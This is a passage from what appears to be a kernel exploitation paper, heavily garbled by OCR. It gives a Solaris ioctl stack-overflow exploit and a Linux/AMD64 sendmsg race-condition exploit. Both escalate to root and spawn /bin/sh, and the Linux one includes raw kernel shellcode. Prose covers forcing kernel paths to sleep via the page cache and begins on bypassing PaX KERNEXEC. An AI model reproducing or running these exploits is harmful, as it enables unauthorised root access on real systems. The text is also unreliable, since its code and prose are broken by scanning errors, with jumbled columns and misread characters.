struct test_comunique t_c; 


ddi_copyin((void *)arg, &t_c, sizeof(struct test_comunique), 0); 


cmn_err(CE_CONT, "Requested to copy over buf %d bytes from %p\n", 
t_c.size, &buf); 


ddi_copyin((void *)t_c.addr, buf, t_c.size, 0); [1] 


return 0; 


} 


static int test_ioctl (dev_t dev, int cmd, intptr_t arg, int mode, 
cred_t *cred_p, int *rval_p ) 


{ 


emn_err(CE_CONT, "ioctl called : cred %d d\n", cred_p->cr_uid, 
cred_p->cr_gid); 


switch ( cmd ) 
{ 
case TEST_STACKOVF: { 
handle_stack (arg); 


< / > 


The vulnerability is quite self explanatory and is a lack of ’input 
Sanitizing’ before calling the ddi_copyin at [1]. 


Exploit follows 


< stuff/expl/solaris/e_stack.c > 


nclude <stdio.h> 
nclude <stdlib.h> 
nclude <string.h> 
nclude <sys/mman.h> 
nclude <sys/types.h> 
nclude <sys/stat.h> 
nclude <fcntl.h> 
nclude "test.h" 


ee ee ee ee 


define BUFSIZ 192 
char buf[192]; 


typedef struct psinfo { 


int pr_flag; /* process flags */ 

int pr_nlwp; /* number of lwps in process */ 
pid_t pr_pid; /* unique process id */ 

pid_t pr_ppid; /* process id of parent */ 
pid_t pr_pgid; /* pid of process group leader */ 
pid_t pr_sid; /* session id */ 

uid_t pr_uid; /* real user id */ 

uid_t pr_euid; /* effective user id */ 

gid_t pr_gid; /* real group id */ 

gid_t pr_egid; /* effective group id */ 
uintptr_t pr_addr; /* address of process */ 


size_t pr_size; /* size of process image in Kbytes */ 
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} psinfo_t; 


define ALIGNPAD 3 


define PSINFO_PATH "/proc/self/psinfo" 


unsigned long getaddr () 


psinfo_t info; 
int fd; 


if ( fd == -1) 


perror ("open"); 
return -1; 


} 


read(fd, (char *)&info, sizeof (info)); 
close (fd); 
return info.pr_addr; 


#define UPSARGS_OFFSET 0x330 + Ox161 


int exploit_me() 


{ 


char *argv[] { "princess", NULL }; 

char *envp[] = { "TERM=vt100", "BASH_HISTORY=/dev/null", 
"HISTORY=/dev/null", "history=/dev/null", 
"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", 
"HISTFILE=/dev/null", NULL }; 


printf("Pleased to see you, my Princess\n"); 
setreuid(0, 0); 

setregid(0, 0); 

execve ("/bin/sh", argv, envp); 

exit (0); 


} 


#define SAFE_FP 0x0000000001800040 + 1 
#define DUMMY_FILE "/tmp/test" 


int main() 


{ 


int fd; 

int ret; 

struct test_comunique t; 

unsigned long *pbuf, retaddr, p_addr; 


memset (buf, ’A’, BUFSIZ); 
p_addr = getaddr(); 
printf("({*] - Using proc_t addr : %p \n", p_addr); 


retaddr = p_addr + UPSARGS_OFFSET + ALIGNPAD; 


printf("[*] - Using ret addr : %p\n", retaddr); 
pbuf = &buf[32]; 
pbouf += 2; 


/* locals */ 
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< / 


The 


for ( ret = 0; ret < 14; rett+ ) 
*pbuf++ = OxBBBBBBBB + ret; 

*pbuf++ = SAFE_FP; 

*pbuf = retaddr - 8; 


t.size = sizeof (buf); 
t.addr = buf; 


fd = open (DUMMY_FILE, O_RDONLY) ; 


ret = ioctl(fd, 1, &t); 
printf("fun d\n", ret); 


exploit_me(); 
close (fd); 


> 


exploit is quite simple (we apologies, but we didn’t have a public one 


to show at time of writing) 


You 
can 


getaddr() uses procfs exported psinfo data to get the proc_t address 
of the running process. 


the return addr is calculated from proc_t addr + the offset of the 
u_psargs array + the thr needed bytes for alignment 


i 


SAFE_FP points just ’somewhere in the data segment’ (and ready to be 
biased for the real dereference). Due to SPARC window mechanism we 
have to provide a valid address that it will be used to ’load’ the 
saved procedure registers upon re-entering. We don’t write on that 
address so whatever readable kernel part is safe. (in more complex 
scenarios you could have to write over too, so take care). 


/tmp/test is just a link to the /devices/pseudo/test@0:0 file 


the exploit has to be compiled as a 32-bit executable, so that the 
syscall_trap32 offset is meaningful 


can compile and test the driver on your boxes, it’s really simple. You 


extend it to test more scenarios, the skeleton is ready for it. 


=o [ 2.4 - A primer on logical bugs : race conditions 

Heap and Stack Overflow (even more, NULL pointer dereference) ar 
seldomly found on their own, and, since the automatic and human auditing 
work goes on and on, they’re going to b ven more rar 


What will probably survive for more time are ’logical bugs’, which may 
lead, at the end, to a classic overflow. 

Figure out a modelization of ’logical bugs’ is, in our opinion, nearly 
impossible, each one is a story on itself. 

Notwithstanding this, one typology of those is quite interesting (and 
‘widespread’) and at least some basic approaches to it are suitable fora 
generic description. 


We’re talking about ’race conditions’. 


In short, we have a race condition everytime we have a small window of 
time that we can use to subvert the operating system behaviour. A race 
condition is usually the consequence of a forgotten lock or other 

syncronization primitive or the use of a variable ’too much time after’ 


the 


sanitizing of its value. Just point your favorite vuln database search 


engine towards ’kernel race condition’ and you’ll find many different 
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examples. 


Winning the race is our goal. This is easier on SMP systems, since the two 
racing threads (the one following the ’raceable kernel path’ and the other 
competing to win the race) can be scheduled (and be bounded) on different 
CPUs. We just need to have the ’racing thread’ go faster than the other 
one, Since they both can execute in parallel. 

Winning a race on UP is harder : we have to force the first kernel path 

to sleep (and thus to re-schedule). We have also to ’force’ the scheduler 
into selecting our /’/racing’ thread, so we have to take care of scheduling 
algorithm implementation (ex. priority based). On a system with a low CPU 
load this is generally easy to get : the racing thread is usually 
‘spinning’ on some condition and is likely the best candidate on the 
runqueue. 


We’re going now to focus more on ’forcing’ a kernel path to sleep, 
analyzing the nowadays common interface to access files, the page cach 
After that we’ll present the AMD64 architecture and show a real race 
exploit for Linux on it, based on the sendmsg [5] vulnerability. 
Winning the race in that case turns the vuln into a stack based one, so 
the discussion will analize stack based explotation on Linux/AMD64 too. 


---[ 2.4.1 - Forcing a kernel path to sleep 


If you want to win a race, what’s better than slowing down your opponent? 
And what’s slower than accessing the hard disk, in a modern computer ? 
Operating systems designers know that the I/O over the disk is one of the 
major bottleneck on system performances and know aswell that it is one of 
the most frequent operations requested. 


Disk accessing and Virtual Memory are closely tied : virtual memory needs 
to access the disk to accomplish demand paging and in/out swapping, while 
the filesystem based I/O (both direct read/write and memory mapping of 
files) works in units of pages and relays on VM functions to perform the 
write out of ‘’dirty’ pages. Moreover, to sensibly increase performances, 
frequently accessed disk pages are kept in RAM, into the so-called ‘’Page 
Cache’. 


Since RAM isn’t an inexhaustible resource, pages to be loaded and ’ cached’ 
into it have to be carefully ’selected’. The first skimming is made by the 
‘Demand Paging’ approach : a page is loaded from disk into memory only 
when it is referenced, by the page fault handler code. 

Once a filesystem page is loaded into memory, it enters into the ’Page 
Cache’ and stays in memory for an unspecified time (depending on disk 
activity and RAM availability, generally a LRU policy is used as an 
evict-policy). 
Since it’s quite common for an userland application to repeatedly access 
the same disk content/pages (or for different applications, to access 
common files), the ’Page Cache’ sensibly increases performances. 


One last thing that we have to discuss is the filesystem ’page clustering’. 
Another common principle in ’caching’ is the ’locality’. Pages near the 
referenced one are likely to be accessed in a near future and since we’re 
accessing the disk we can avoid the future seek-rotation latency if we 
load in more pages after the referenced one. How many to load is 
determined by the page cluster value. 

On Linux that value is 3, so 2%3 pages are loaded after the referenced 

one. On Solaris, if the pages are 8-kb sized, the next eight pages on a 
64kb boundary are brought in by the seg_vn driver (mmap-case). 


Putting all together, if we want to force a kernel path to sleep we need 
to make it reference an un-cached page, so that a ’fault’ happens due to 
demand paging implementation. The page fault handler needs to perform disk 
I/O, so the process is put to sleep and another one is selected by the 
scheduler. Since probably we want aswell our ’controlled contents’ to be 
at the faulting address we need to mmap the pages, modify them and then 
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exhaust the page cache before making the kernel re-access them again. 


Filling the ’page cache’ has also the effect of consuming a large quantity 
of RAM and thus increasing the in/out swapping. On modern operating 
systems one can’t create a condition of memory pressure only by exhausting 
the page cache (as it was possible on very old implementations), since 
only some amount of RAM is dedicated to the Page Cache and it would keep 
on stealing pages from itself, leaving other subsystems fr to perform 
well. But we can manage to exhaust those subsystem aswell, for example by 
making the kernel do a large amount of ’surviving’ slab-allocations. 


Working to put the VM under pressure is something to take always in mind, 
since, done that, one can manage to slow down the kernel (favouring races) 
and make kmalloc or other allocation function to fail. (A thing that 
seldomly happens on normal behaviour). 


It is time, now, for another real life situation. We’1ll show the sendmsg 
[5] vulnerability and exploiting code and we’ll describe briefly the AMD64 
architectural more exploiting-relevant details. 


---[ 2.4.2 - AMD64 and race condition exploiting: sendmsg 


AMD64 is the 64-bit ’extension’ of the x86 architecture, which is natively 
supported. It supports 64-bit registers, pointers/virtual addresses and 
integer/logic operations. AMD64 has two primary modes of operation, ’Long 
mode’, which is the standard 64-bit one (32-bit and 16-bit binaries can be 
still run with almost no performance impact, or even, if recompiled, with 
some benefit from the extended number of registers, thanks to the 
sometimes-called ’compatibility mode’) and ’Legacy mode’, for 32-bit 
operating systems, which is basically just like having a standard x86 
processor environment. 


Even if we won’t use all of them in the sendmsg exploit, we’re going now 
to sum a couple of interesting features of the AMD64 architecture 


- The number of general purpose register has been extended from 8 up to 
16. The registers are all 64-bit long (referred with /r[name|num]’, 
f.e. rax, r10). Just like what happened when took over the transition 
from 16-bit to 32-bit, the lower 32-bit of general purpose register 
are accessible with the ’e’ prefix (f.e. eax). 


— push/pop on the stack are 64-bit operations, so 8 bytes are 
pushed/popped each time. Pointers are 64-bit too and that allows a 
theorical virtual address space of 2*%64 bytes. As happens for the 
UltraSPARC architecture, current implementations address a limited 
virtual address space (2%48 bytes) and thus have a VA-hole (the least 
Significant 48 bits are used and bits from 48 up to 63 must be copies 
of bit 47 : the hole is thus between OX7FFFFFFFFFFF and 
OxFFFF 800000000000). 

This limitation is strictly implementation-dependant, so any future 
implementation might take advantage of the full 2%64 bytes range. 


- It is now possible to reference data relative to the Instruction 
Pointer register (RIP). This is both a good and a bad news, since it 
makes easier writing position independent (shell) code, but also makes 
it more efficient (opening the way for more performant PIE-alike 
implementations) 


—- The (in)famous NX bit (bit 63 of the page tabl ntry) is implemented 
and so pages can be marked as No-Exec by the operating system. This is 
less an issue than over UltraSPARC since actually there’s no operating 
system which implements a separated userspace/kernelspace addressing, 
thus leaving open space to the use of the ’return-to-userspace’ 
tecnique. 


— AMD64 doesn’t support anymore (in ’long mode’) the use of 
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segmentation. This choice makes harder, in our opinion, the creation 
of a separated user/kernel address space. Moreover the FS and GS 
registers are still used for different pourposes. As we’ll see, th 
Linux Operating System keeps the GS register pointing to the ’current’ 
PDA (Per Processor Data Structure). (check : /include/asm-x86_64/pda.h 
struct x8664 pda .. anyway we’1ll get back on that in a short). 


After this brief summary (if you want to learn more about the AMD64 
architecture you can check the reference manuals at [3]) it is time now to 
focus over the ’real vulnerability’, the sendmsg [5] one 


"When we copy 32bit ->msg_control contents to kernel, we walk the 

same userland data twice without sanity checks on the second pass. 
Moreover, if original looks small enough, we end up copying to on-stack 
array." 


< linux-2.6.9/net/compat.c > 


int cmsghdr_from_user_compat_to_kern(struct msghdr *kmsg, 
unsigned char *stackbuf, int stackbuf_size) 
{ 
struct compat_cmsghdr __user *ucmsg; 
struct cmsghdr *kcmsg, *kcmsg_base; 
compat_size_t ucmlen; 
__kernel_size_t kcmlen, tmp; 


kemlen = 0; 
kcmsg_base = kcmsg = (struct cmsghdr *)stackbuf; [1] 
[te] 
while(ucmsg != NULL) { 
if (get_user(ucmlen, &ucmsg->cmsg_len) ) [2] 


return -—EFAULT; 


/* Catch bogons. */ 
if (CMSG_COMPAT_ALIGN(ucmlen) < 
CMSG_COMPAT_ALIGN (sizeof (struct compat_cmsghdr) ) ) 
return —-EINVAL; 
if((unsigned long) (((char __user *)ucmsg - (char __user 
*)kmsg->msg_control) 


+ ucmlen) > kmsg->msg_controllen) [3] 
return —-EINVAL; 


tmp = ((ucmlen -— CMSG_COMPAT_ALIGN (sizeof (*ucmsg))) + 
CMSG_ALIGN (sizeof (struct cmsghdr))); 


kcmlen += tmp; [4] 
ucmsg = cmsg_compat_nxthdr(kmsg, ucmsg, ucmlen); 
} 
[eset] 
if(kcmlen > stackbuf_size) [5] 


kcmsg_base = kcmsg = kmalloc(kcmlen, GFP_KERNEL) ; 


while(ucmsg != NULL) { 
__get_user(ucmlen, &ucmsg->cmsg_len) ; [6] 
tmp = ((ucmlen -— CMSG_COMPAT_ALIGN (sizeof (*ucmsg))) + 


CMSG_ALIGN (sizeof (struct cmsghdr))); 
kcemsg->cmsg_len = tmp; 
__get_user(kcmsg->cmsg_level, é&ucmsg->cmsg_level); 
__get_user(kcmsg->cmsg_type, &ucmsg->cmsg_type) ; 


/* Copy over the data. */ 
if (copy_from_user (CMSG_DATA(kcmsg) , [eid 
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CMSG_COMPAT_DATA(ucmsg) , 
(ucmlen — 
CMSG_COMPAT_ALIGN (sizeof (*ucmsg) ))) ) 
goto out_free_efault; 


ar a 


As it is said in the advisory, the vulnerability is a double-reference to 
some userland data (at [2] and at [6]) without sanitizing the value the 
second time it is got from the userland (at [3] the check is performed, 
instead). That ’data’ is the ’size’ of the user-part to copy-in 
(7ucmlen’), and it’s used, at [7], inside the copy_from_user. 


This is a pretty common scenario for a race condition : if we create two 
different threads, make the first on nter the codepath and , after [4], 
we manage to put it to sleep and make the scheduler choice the other 
t 
fe) 


hread, we can change the /’ucmlen’ value and thus perform a /buffer 
verflow’. 


* 


he kind of overflow we’re going to perform is /’/decided’ at [5] : if the 
len is little, the buffer used will be in the stack, otherwise it will be 
kmalloc’ed. Both the situation are exploitable, but we’ve chosen the stack 
based one (we have already presented a slab exploit for the Linux 
operating system before). We’re going to use, inside the exploit, the 
tecnique we’ve presented in the subsection before to force a process to 
sleep, that is making it access data on a cross page boundary (with the 
second page never referenced before nor already swapped in by the page 
clustering mechanism) 


> 0x20020000 [MMAP_ADDR + 32 * PAGE_SIZE] [*] 

cmsg_len first cmsg_len starts at Ox2001fff4 
cmsg_level first struct compat_cmsghdr 
cmsg_type 

> 0x20020000 [cross page boundary] 
cmsg_len second cmsg_len starts at 0x20020000) 
cmsg_level second struct compat_cmsghdr 
cmsg_type 

> 0x20021000 
*] One of those so-called ‘’runtime adjustement’. The page clustering 


wasn’t showing th xpected behaviour in the first 32 mmaped-pages, 
while was just working as expected after. 


As we said, we’re going to perform a stack-based explotation writing past 
the ‘’stackbuf’ variable. Let’s s where we get it from 


< linux-2.6.9/net/socket.c > 


asmlinkage long sys_sendmsg(int fd, struct msghdr __user *msg, unsigned 
flags) 
{ 

struct compat_msghdr __user *msg_compat = 

(struct compat_msghdr __user *)msg; 

struct socket *sock; 

char address [MAX _SOCK_ADDR]; 


struct iovec iovstack[UIO_FASTIOV], *iov = iovstack; 
unsigned char ctl[sizeof(struct cmsghdr) + 20]; 
unsigned char *ctl_buf = ctl; 


struct msghdr msg_sys; 
int err, ctl_len, iov_size, total_len; 


if ((MSG_CMSG_COMPAT & flags) && ctl_len) { 


ctl, sizeof(ctl)); 
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err = cmsghdr_from_user_compat_to_kern(&é&msg_sys, 
Perdter] 

< ff 

The situation is less nasty as it seems 


the 
‘'msg_sys’ 
That simplifies a 
care of ’emulating’ in userspace 
overflow and the ’return’ of the 
Exploiting in this ’second case’ 
doable aswell. 


code on) 
struct placed as if it 


The shellcode for the exploit is 
the AMD64 is a ’superset’ of the 


before for the Linux/x86 environment, 


important different points the 


‘userspac 


For the first point, let’s start 


implementation 


lot our exploiting task, 


(at least on the systems we tested 


thanks to gcc reordering the stack variables we get our 


was the first variable. 

since we don’t have to take 
the structure referenced between our 
function (for example the struct sock). 
would be slightly more complex, but 


not much different (as expected, since 
x86 architecture) from the ones provided 
netherless we’ve two focus on two 
'thread/task struct dereference’ and the 


context switch approach’. 


analyzing the get_current () 


< linux-2.6.9/include/asm-x86_64/current.h > 


#include <asm/pda.h> 


static inline struct task_struct 
{ 
struct task_struct *t = 
return t; 


defin 


current get_current () 


define GET_CURRENT (reg) 


< / > 


*get_current (void) 


read_pda(pcurrent) ; 


movq *gS: (pda_pcurrent),reg 


< linux-2.6.9/include/asm-x86_64/pda.h > 


struct x8664_pda 


struct task_struct *pcurrent; 


unsigned long data_offset; 
address */ 

struct x8664 pda *me; 

unsigned long kernelstack; 


[eogcn'] 

#define pda_from_op(op,field) ({ 
typedef typeof_fi 
switch 

case 2: \ 

asm volatile(op "w %%gs:%P1,%0": 

(ret__):" 

era 


#define read_pda(field) 


< / > 


The task_struct is thus no more into the 


ld(struct x8664_pda, 
(sizeof_field(struct x8664_pda, 


i" (pda_offset (field) ):"memory"); 


/* Current process */ 
/* Per cpu data offset from linker 


/* Pointer to itself */ 
/* top of kernel stack for current */ 


\ 
field) T_; T 
fiel 


Woy 


break; \ 


pda_from_op ("mov", field) 


‘current stack’ (more precisely, 


referenced from the thread_struct which is actually saved into the 


‘current stack’), 


keeps many information relative to the ’current’ 


but is stored into the ’struct x8664_ pda’. 


This struct 
process and the CPU it is 
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running over 
over, 


Kernel Path, 
register. 
interested in) 
is just a matter 


movq *gSs 


From that point on the ’scanning’ 


(kernel stack address, 
number of NMI on that cpu, 
As you can see from the 
the address of the ’struct x8664_pda’ 
Moreover, (which is the one we’re 


is the first one, 
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etc). 
'pda_from_op’ macro, 
the ’pcurrent’ member 
so obtaining 
of doing a 


:0x0, Srax 


used in the previously shown exploits. 


If we don’t perform the gs restoring, 


39 


irq nesting counter, 


during the execution 


ofa 
is kept inside the 


it from inside a sh 


cpu it is running 


SS 
actually 
licod 


to locate uid/gid/etc is just the same 


The second point which quite differs from the x86 case is the ’restore’ 
part (which is, also, a direct consequence of the %gs using). 

First of all we have to do a ’64-bit based’ restore, that is we’ve to push 
the 64-bit registers RIP,CC,RFLAGS,RSP and SS and call, at the end, the 
‘iretq’ instruction (th xtended version of the ’iret’ one on x86). 

Just before returning we’ve to remember to perform the ’swapgs’ 
instruction, which swaps the %gs content with the one of the KernelGSbase 
(MSR address C000_0102h). 


at the next syscall or interrupt the 


kernel will use an invalid value for the gs register and will just crash. 


H Ps. th 


shellcod 


in asm inline notation 


r 


void stubé4bit () 
{ 


asm volatile ( 


} 


With UI 
and COD 
returni 


B_ OFFS 


D being the ‘uid’ 


ng into in userspace. 
runtime in the exploit 


edx, 
ovl edx, 
jmp 4£\t\ 
"3: add $4 
inc %%ecx 
jmp 1lb\t\ 
7\e\n" 
wapgs\t\ 
ovq $0x000000000000002b, 0x20 
ovq %1,0x18(%%rsp) \t\n" 
ovq $0x0000000000000246, 0x10 
ovq $0x0000000000000023, 0x8 ( 
ovq %2,0x0(%%rsp) \t\n" 
"iretq\t\n" 
"i" (UID), 


oo 
66 


% 


"1" (STACK_OFFSET), 


(SSrsp) 


(%% 


i 


of the current running process and STACK_OFFS! 
ET the address of the stack and cod 


‘segment’ we’r 


All those values 
‘'make_kjump’ function 


< stuff/expl/linux/sracemsg.c > 


#define PAGE SIZE 0x1000 
#define MMAP_ADDR ((void*) 0x20000000) 
#define MMAP_ NULL ((void*) 0x00000000) 


are taken and patched at 
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define PAGE _NUM 128 


GJ 


define PATCH CODE (base,offset,value) \ 
*((uint32_t *) ((char*)bas + offset)) = (uint32_t) (value) 


define fatal_errno(x,y) { perror(x); exit(y); } 
struct cmsghdr *g_ancillary; 


/* global shared value to sync threads for race */ 
volatile static int glob_race = 0; 


#define UID_OFFSET 1 
define STACK_OFF_OFFSET 69 
define CODE_OFF_OFFSET 95 


-] 


int make_kjump (void) 


void *stack_map = mmap((void*) (0x11110000), 0x2000, 
PROT_READ|PROT_WRITE, MAP ANONYMOUS |MAP_PRIVATE|MAP_FIXED, 0, 0); 
if(stack_map == MAP_FAILED) 
fatal_errno("mmap", 1); 


void *shellcode_map = mmap(MMAP_NULL, 0x1000, 


PROT_READ | PROT_WRITE|PROT_EXEC, MAP ANONYMOUS |MAP_PRIVATE|MAP_FIXED, 0, 
0); 
if (shellcode_map == MAP_FAILED) 


fatal_errno("mmap", 1); 
memcpy (shellcode_map, kernel_stub, sizeof (kernel_stub)-1); 
PATCH_CODE (MMAP_NULL, UID_OFFSET, getuid()); 


PATCH_CODE (MMAP_NULL, STACK_OFF_OFFSET, 0x11111111); 
PATCH_CODE (MMAP_NULL, CODE_OFF_OFFSET, &eip_do_exit); 


ee hale 


The rest of the exploit should be quite self-explanatory and we’re going 
to show the code here after in a short. Note the lowering of the priority 
inside start_thread_priority (’nice(19)’), so that we have some mor 
chance to win the race (the /’/glob_race’ variable works just like a 
spinning lock for the main thread - check ’race_func()’). 


As a last note, we use the ’rdtsc’ (read time stamp counter) instruction 
to calculate the time that intercurred while trying to win the race. If 
this gap is high it is quite probable that a scheduling happened. 

The task of ’flushing all pages’ (inside page cache), so that we’1ll be 
sure that we’ll end using demand paging on cross boundary access, is not 
implemented inside the code (it could have been easily added) and is left 
to the exploit runner. Since we have to create the file with controlled 
data, those pages end up cached in the page cache. We have to force the 
subsystem into discarding them. It shouldn’t be hard for you, if you 
followed the discussion so far, to perform tasks that would ’flush the 
needed pages’ (to disk) or add code to automatize it. (hint : mass find & 
cat * > /dev/null is an idea). 


Last but not least, since the vulnerable function is inside ’compat.c’, 
which is the ’compatibility mode’ to run 32-bit based binaries, remember to 
compile the exploit with the -m32 flag. 


< stuff/expl/linux/sracemsg.c > 


#include <stdio.h> 
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nclude 
nclude 
nclude 
nclude 
nclude 
lude 
nclude 
nclude 
nclude 
nclude 
nclude 


<signal.h> 
<unistd.h> 
<stdlib.h> 
<string.h> 
<stdint.h> 
<sys/types.h> 
<sys/stat.h> 
<fcntl.h> 
<sys/mman.h> 
<sched.h> 
<sys/socket.h> 


Re ee ee a ee ee 
=) 
Q 


define PAGE SIZE 0x1000 

define MMAP_ADDR ((void*)0x20000000) 
define MMAP_ NULL ((void*)0x00000000) 
define PAGE _NUM 128 


fine PATCH _CODE(base,offset,value) \ 
*((uint32_t *) ((char*)bas + 


Q, 
0) 
id 
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define fatal_errno(x,y) { perror(x); 


struct cmsghdr *g_ancillary; 


offset) ) 


= (uint32_t) (value) 


exit(y); } 


/* global shared value to sync threads for race */ 


volatile static int glob_race = 0; 


define UID_OFFSET 1 
define STACK_OFF_OFFSET 69 
define CODE_OFF_OFFSET 95 


char kernel_stub[] = 


"\ xbe\xe8\x03\x00\x00" 
"\x65\x48\x8b\x04\x25\x00\x00\x00\x00" 
"\x31\xc9" 

"\x81\x£9\x2c\x01\x00\x00" 

"\x74\x1lc" 

<stub64bit+0x38> 

"\x8b\x10" 

"\x39\xf2" 

"\x75\x0e" 

<stub64bit+0x30> 

"\x8b\x50\x04" 

"\x39\xf2" 

"\x75\x07" 

<stub64bit+0x30> 

"\x31\xd2" 

"\x89\x50\x04" 

"\xeb\x08" 

<stub64bit+0x38> 

"\x48\x83\xc0\x04" 

"\xff\xcl" 

"\xeb\xdc" 

<stub64bit+0x14> 

"\xO0f\x01\xf£8" 
"\x48\xc7\x44\x24\x20\x2b\x00\x00\x00" 
"\x48\xc7\x44\x24\x18\x11\x11\x11\x11" 
"\x48\xc7\x44\x24\x10\x46\x02\x00\x00" 
"\x48\xc7\x44\x24\x08\x23\x00\x00\x00" 
32-bit , 33 64-bit cs */ 
"\x48\xc7\x04\x24\x22\x22\x22\x22" 
"\x48\xcf"; 


void eip_do_exit (void) 
{ 
char *argvx[] = 


{"/bin/sh", NULL}; 


mov SO0x3e8, %esi 

mov $gs:0x0, Srax 

xor SeCcx, SECX (15 
cmp SOx12c, %ecx 

je 400af0 

mov (Srax) , sedx 

cmp Sesi, tedx 

jne 400ae8 

mov 0x4 (Srax) , tedx 
cmp Sesi, tedx 

jne 400ae8 

xor Sedx, Sedx 

mov Sedx, 0x4 (Srax) 

jmp 400af0 

add SOx4, rax 

inc SeECX 

jmp 400acc 

swapgs (54 

movg S0x2b, 0x20 (%rsp) 
movq $0x11111111, 0x18 (Srsp) 
movg $0x246,0x10(%rsp) 
movqd $0x23,0x8(%rsp) /* 23 
movq $0x22222222, (Srsp) 
iretgq 
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printf ("uid=%d\n", 
execve ("/bin/sh", 
exit(1); 


geteuid()); 
argvx, NULL); 


This function maps stack and code segment 
— 0x0000000000000000 —- 0x0000000000001000 
— 0x0000000011110000 —- 0x0000000011112000 


+ + F 


«ff 


int make_k jump (void) 
{ 
void *stack_map mmap ( (void*) (0x11110000) 
PROT_READ | PROT_WRITE, 
if (stack_map MAP_FAILED) 
fatal_errno("mmap", 1); 


void *shellcode_map = mmap(MMAP_NULL, 0x10 


PROT_READ | PROT_WRITE|PROT_EXEC, 
0); 
if (shellcode_map == MAP_FAILED) 


fatal_errno("mmap", 1); 


memcpy (shellcode_map, kernel_stub, 


PATCH_CODE (MMAP_NULL, UID_OFFSET, getuid() 
PATCH_CODE (MMAP_NULL, STACK_OFF_OFFSET, 
PATCH_CODE (MMAP_NULL, CODE_OFF_OFFSET, 


} 


int start_t 
{ 
char *stack malloc (PAGE_SIZE*4); 
int tid clone(f, stack + PAGE _SIZE*4 -4, 
CLONE_FS | CLONE_FILES | CLONE_SIGHAND | CLONE_VM, 
if (tid < 0) 
fatal_errno("clo 


hread_priority(int (*f) (void *), 


5 


ne", 1); 
nice(19); 

sleep(1); 

return tid; 


} 


int race_func(void* noarg) 
{ 
printf ("[*] 
while (1) 
{ 


thread racer getpid()=%d\n", g 


if (glob_race) 
{ 


g_ancillary->cmsg_len = 500; 
return; 
} 
} 
} 
uinté64_t tsc() 
{ 
uinté64_t ret; 
asm volatile ("rdtsc" "=A" (ret) ); 


return ret; 


} 


struct tsc_stamp 


MAP_ANONYMOUS | MAP_PRIVAT 


42 


(future code space) 
(future stack space) 


, 0x2000, 


00, 


i 


Q0x11111111); 
&eip_do_exit); 


void* arg) 


arg); 


etpid()); 


E |MAP_FIX 


MAP_ANONYMOUS |MAP_PRIVATE|MAP_FIX 


sizeof (kernel_stub)-1); 
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uint64_t before; 

uint64_t after; 

uint32_t access; 
}; 


struct tsc_stamp stamp[128]; 


inline char *flat_file_mmap(int fs) 


{ 


void *addr = mmap(MMAP_ADDR, PAGE_SIZE*PAGE_NUM, PROT_READ|PROT_WRIT! 


MAP_SHARED|MAP_FIXED, fs, 0); 
if (addr == MAP _FATLED) 
fatal_errno("mmap", 1); 
return (char*) addr; 


} 


void scan_addr(char *memory) 
{ 
inte. 1s 
for(i=l; i<PAGE_NUM-1; i++) 
{ 


stamp[i].access = (uint32_t) (memory + i*PAGE_SIZE); 
uint32_t dummy = *((uint32_t *) (memory + i*PAGE_SIZE-4) ); 
stamp[i].before = tsc(); 

dummy = *((uint32_t *) (memory + i*PAGE_SIZE)); 
stamp[i].after = tsc(); 


} 


/* make code access first 32 pages to flush page-cluster */ 
/* access: 0x20000000 — 0x2000XXXx */ 


void start_flush_access(char *memory, uint32_t page_num) 
{ 
int i; 
for(i=0; i<page_num; itt) 
{ 
uint32_t dummy = *((uint32_t *) (memory + i*PAGE_SIZE)); 
} 


void print_single_result (struct tsc_stamp *entry) 

{ 
printf ("Accessing: %p, tsc-difference: %lld\n", entry->access, 
ntry->after ntry->before) ; 

} 


void print_result () 
{ 
ints 1; 
for(i=l; i<PAGE_NUM-1; i++) 
{ 
printf ("Accessing: %p, tsc-difference: %lld\n", stamp[i].access, 
stamp[i].after - stamp[i].before); 


} 


} 


void fill_ancillary(struct msghdr *msg, char *ancillary) 


{ 


msg->msg_control = ((ancillary + 32*PAGE_SIZE) - sizeof (struct 
cmsghdr)); 
msg->msg_controllen = sizeof(struct cmsghdr) * 2; 
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/* set global var thread race ancillary data chunk */ 
g_ancillary = msg->msg_control; 


struct cmsghdr* tmp = (struct cmsghdr *) (msg->msg_control); 
tmp->cmsg_len = sizeof(struct cmsghdr); 

tmp->cmsg_level = 0; 

tmp->cmsg_type = 0; 

tmpt+; 

tmp->cmsg_len = sizeof(struct cmsghdr); 

tmp->cmsg_level = 0; 

tmp->cmsg_type = 0; 

tmpt+; 


memset (tmp, 0x00, 172); 
} 


int main() 


{ 
struct tsc_stamp single_stamp = {0}; 
struct msghdr msg = {0}; 


memset (&éstamp, 0x00, sizeof (stamp) ); 
int fd = open("/tmp/file", O_RDWR) ; 
if (fd == -1) 

fatal_errno("open", 1); 


char *addr = flat_file_mmap (fd); 


fill_ancillary(é&msg, addr); 


munmap (addr, PAGE_SIZE*PAGE_NUM) ; 
close (fd); 

make_kjump (); 

sync(); 


printf("Flush all pages and press a enter:)\n"); 
getchar(); 


fd = open("/tmp/file", O_RDWR); 

if (fd == -1) 
fatal_errno("open", 1); 

addr = flat_file_mmap (fd); 


int t_pid = start_thread_priority(race_func, NULL); 
printf("({*] thread main getpid()=%d\n", getpid()); 


start_flush_access(addr, 32); 


int, selL2) 
int sp_ret = socketpair(AF_UNIX, SOCK_STREAM, 0, sc); 
if(sp_ret < 0) 

fatal_errno("socketpair", 1); 


single_stamp.access = (uint32_t)g_ancillary; 
single_stamp.before = tsc(); 


glob_race =1; 
sendmsg(sc[0], &msg, 0); 


Single_stamp.after = tsc(); 
print_single_result (&single_stamp) ; 
kill (t_pid, SIGKILL); 


munmap (addr, PAGE_SIZE*PAGE_NUM) ; 
close (fd); 
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------ [ 3 - Advanced scenarios 


In an attempt to ’’complete’’ our tractation on kernel exploiting we’re 
now going to discuss two ’advanced scenarios’ : a stack based kernel 
exploit capable to bypass PaX [18] KERNEXEC and Userland / Kernelland 
split and an effective remot xploit, both for the Linux kernel. 


---[ 3.1 - PaX KERNEXEC & separated kernel/user space 


The PaX KERNEXEC option emulates a no-exec bit for pages at kernel land 
on an architecture which hasn’t it (x86), while the User / Kerne Land 
split blocks the ’return-to-userland’ approach that we hav xtensively 
described and used in the paper. With those two protections active we’re 
basically facing the same scenario we encountered discussing the 
Solaris/SPARC environment, so we won’t go in more details here (to avoid 
duplicating the tractation). 


This time, thou, we won’t have any executable and controllable memory area 
(no u_psargs array), and we’re going to present a different tecnique which 


doesn’t require to have one. Even if the idea behind applyes well to any 
no-exec and separated kernel/userspac nvironment, as we’ll see ina 


short, this approach is quite architectural (stack management and function 
